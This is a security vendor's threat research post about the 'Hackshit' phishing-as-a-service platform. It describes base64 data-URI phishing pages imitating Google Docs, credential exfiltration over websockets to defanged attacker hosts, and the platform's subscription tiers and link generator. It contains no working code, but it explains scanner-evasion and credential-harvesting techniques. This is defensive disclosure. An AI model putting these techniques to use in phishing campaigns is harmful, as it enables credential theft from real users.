Netskope Threat Research Labs recently discovered a Phishing-as-a-Service (PhaaS) platform named Hackshit, that records the credentials of the phished bait victims. The phished bait pages are packaged with base64 encoding and served from secure (HTTPS) websites with “.moe” top level domain (TLD) to evade traditional scanners. “.moe” TLD is intended for the purpose of ‘The marketing of products or services deemed’. The victim’s credentials are sent to the Hackshit PhaaS platform via websockets. The Netskope Active Platform can proactively protect customers by creating custom applications and a policy to block all the activities related to Hackshit PhaaS. This blog will detail the discovery of Hackshit PhaaS, the inner working and revenue model of this PhaaS platform.
Discovery of the PhaaS
During our ongoing research about the trends of CloudPhishing attacks, we observed a phishing page using data URI scheme to serve base64 encoded content (data:text/html;base64) delivered from “https://a.safe.moe”. When the link was accessed, it presented a phished Google Docs page asking for credentials as shown in Figure 1.
Figure 1: First phished page asking for credentials
Once the credentials are entered, it presented another phishing page whose source uses a data URI scheme to serve base64 encoded content (data:text/html;base64) again from https://a.safe.moe as shown in Figure 2.
Figure 2: Second Phished page asking for recovery details
The first phishing page was intended to get the victim’s email credentials whereas the second phished page was intended to get the recovery details of the email account of the victim. After the details are entered, the victim is redirected to the original Google recovery page.
We decoded these two phishing pages to find out further details of the functionality. The snippets of the first and second decoded pages are shown in Figure 3 and Figure 4.
Figure 3: First decoded phishing page asking for credentials
Figure 4: Second decoded phished page asking for recovery details
As highlighted in the snippets of the decoded pages above, the credentials are sent to the attacker via a websocket to https://pod[.]logshit[.]com and https://pod-1[.]logshit[.]com. A sample packet capture of the same is shown in Figure 5.
Figure 5: Network capture to pod[.]logshit[.]com via websocket
Accessing logshit[.]com led us to the discovery of the PhaaS website named Hackshit as shown in Figure 6. Further research concluded the website is serving as a PhaaS platform.
Figure 6: Hackshit web page
Hackshit Phishing as a Service
Hackshit serves as a PhaaS platform that caters several phishing services and also a marketplace to buy and sell such services.
Related subdomains
VirusTotal passive DNS resolved several domains related to Hackshit as shown in Figure 7.
Figure 7: Passive DNS of domains related to Hackshit
Hackshit webportal
The Hackshit website had a video demonstration appealing users to learning hacking, meeting hackers online and making money. The website has a presence in Facebook, Twitter, Instagram and Youtube. The portal allowed users to create a free account and also have a free trial of the services offered. The registration page is as shown in Figure 8.
Figure 8: Registration page of Hackshit PhaaS
SSL certificate
Hackshit[.]com is powered with a SSL server certificate by LetsEncrypt that provides free, automated, and open certificate authority by the nonprofit Internet Security Research Group (ISRG). The SSL certificate of the website is shown in Figure 9.
Figure 9: SSL server certificate of HackShit
The website contained inline manuals, free tutorials, chat support, comments section, links/generator, logs and a marketplace.
Subscription pricing
Hackshit PhaaS offers several subscription tiers from Starter to Master, ranging from 40 USD per week to 250 USD for 2 months as shown in Figure 10.
Figure 10: Hackshit subscription pricing
Payment modes
The payments are accepted via most of the payment methods as shown in Figure 11.
Figure 11: Hackshit payment modes
Links / Generator
The links/generator option provided several links for creating phished page links when clicked on ‘Generate’ option below the theme as shown in Figure 12.